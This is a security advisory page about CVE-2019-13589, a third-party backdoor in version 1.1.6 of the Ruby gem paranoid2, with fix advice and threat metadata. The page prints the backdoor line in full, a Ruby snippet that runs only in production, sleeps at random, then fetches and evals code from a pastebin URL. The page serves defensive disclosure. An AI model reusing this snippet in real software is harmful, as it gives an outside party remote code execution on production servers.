Malicious Package Affecting paranoid2 package, versions =1.1.6
Threat Intelligence
Exploit Maturity
Mature
EPSS
1.82% (89th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-RUBY-PARANOID2-451600
- published 15 Jul 2019
- disclosed 14 Jul 2019
- credit Ruian Duan
Introduced: 14 Jul 2019
Malicious CVE-2019-13589 Open this link in a new tabHow to fix?
Avoid using paranoid2
altogether. Furthermore, Downgrading to v1.1.5 will ensure no malicious code execution is possible.
Overview
paranoid2 is a paranoid models for rails 4
Affected versions of this package are a Malicious Package. paranoid2 1.1.6 for Ruby includes a code-execution backdoor inserted by a third party.
Backdoor Code
_!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/X9S6XQFx')))}}}if Rails.env[0]=="p"}
References
CVSS Scores
version 3.1